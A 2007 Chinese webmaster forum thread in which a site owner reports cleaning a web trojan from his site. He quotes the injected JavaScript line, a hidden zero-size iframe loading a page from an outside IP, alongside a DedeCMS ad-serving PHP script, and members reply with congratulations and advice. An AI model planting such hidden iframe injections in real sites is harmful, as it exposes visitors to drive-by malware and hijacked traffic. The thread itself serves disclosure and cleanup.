静水流深 发表于 2007-10-30 07:38:20

webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法

请大家再去帮我复查下,看还有没木马,另外前年的教程已经免费发布上去了,自己去下或者看。

挂马的人不是专业黑客,是搞这行的,把我的JS里加了个这个

document.write("<iframe src=http://58.211.79.107/xs.htm?88 width=0 height=0></iframe>");
<?php
require(dirname(__FILE__)."/../include/config_base.php");
$aid = ereg_replace("[^0-9]","",$aid);
$dsql = new DedeSql(false);
$row = $dsql->GetOne("Select * From #@__myad where aid='$aid'");
$dsql->Close();
if($row['timeset']==0) $adbody = $row['normbody'];
else{
$ntime = mytime();
if($ntime>$row['endtime']||$ntime<$row['starttime']){ $adbody = $row['expbody']; }
else{ $adbody = $row['normbody']; }
}
$adbody = str_replace('"','\"',$adbody);
$adbody = str_replace("\r","\\r",$adbody);
$adbody = str_replace("\n","\\n",$adbody);
echo "<!--\r\n";
echo "document.write(\"{$adbody}\");\r\n";
echo "-->\r\n";
?>


自己看第一行 根据这个去找他到底想干什么吧 其实意图很明显的,一是玩计数器,二是做停放

LLC 发表于 2007-10-30 08:03:15

国内的停放?

renjinhua01 发表于 2007-10-30 08:08:24

嗯,不错,恭喜!

可乐加冰 发表于 2007-10-30 08:24:29

静水老大厉害.

jerry 发表于 2007-10-30 08:32:05

查到就好啦:cool:

在路上 发表于 2007-10-30 08:33:04

这些人没意思晒。或许是眼红,

ommofans 发表于 2007-10-30 10:24:06

老大还是反应很迅速的,一下就发现了,没有要我赚到2000论坛币

le19754 发表于 2007-10-30 10:27:08

原帖由 ommofans 于 2007-10-30 10:24 发表 http://www.cnwebmasters.cn/images/common/back.gif
老大还是反应很迅速的,一下就发现了,没有要我赚到2000论坛币
:lol: 以后得抓紧啦

龙少 发表于 2007-10-30 12:01:34

:)

恭喜发财 发表于 2007-10-30 12:06:43

:lol: 以后你放我报告。来赚币。

mcc514 发表于 2007-10-30 14:36:27

怎么杀啊?我可能中了。但是杀毒 软件没报。

net007 发表于 2007-10-30 14:40:11

厉害啊

萧枫叶 发表于 2007-10-30 18:03:34

原帖由 mcc514 于 2007-10-30 14:36 发表 http://www.cnwebmasters.cn/images/common/back.gif
怎么杀啊?我可能中了。但是杀毒 软件没报。

上虚拟机.运行.监控情况,抓包分析.

nod32 发表于 2007-10-30 18:59:18

不会是论坛里的人吧。

new168 发表于 2007-10-30 19:02:28

肯定是个病毒撒

谷歌 发表于 2007-10-30 19:19:31

原帖由 nod32 于 2007-10-30 18:59 发表 http://www.cnwebmasters.com/images/common/back.gif
不会是论坛里的人吧。
肯定是了:lol:

ddtme 发表于 2007-10-30 19:45:14

看来有人想借东风:lol:

winner01 发表于 2007-10-30 20:23:45

大家好好学啊,按现在的会员数7000+计算,希望哪天上论坛时能帮大家义务运行这7000+个IFRAME, 前提是只要网页还打得开!:lol:

kaixinde 发表于 2007-10-30 21:31:53

有时放病毒,有时不放

taoq 发表于 2007-10-31 10:31:46

严重软文AD...

velee 发表于 2007-11-3 23:03:00

思路 啊
不错咯

woshilanse 发表于 2007-11-8 17:14:06

哈哈~被人搞了就得承认-至少他比你专业

kongknet 发表于 2007-11-8 23:10:54

网站有后门吧
我以前网站经常被放JS

zhengjun 发表于 2007-12-15 09:10:40

老大真厉害

我高兴 发表于 2007-12-15 10:31:10

把放木马的人送到法院去:lol:

aza 发表于 2007-12-15 10:56:32

什么世道到处都是木马
页: [1]
查看完整版本: webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法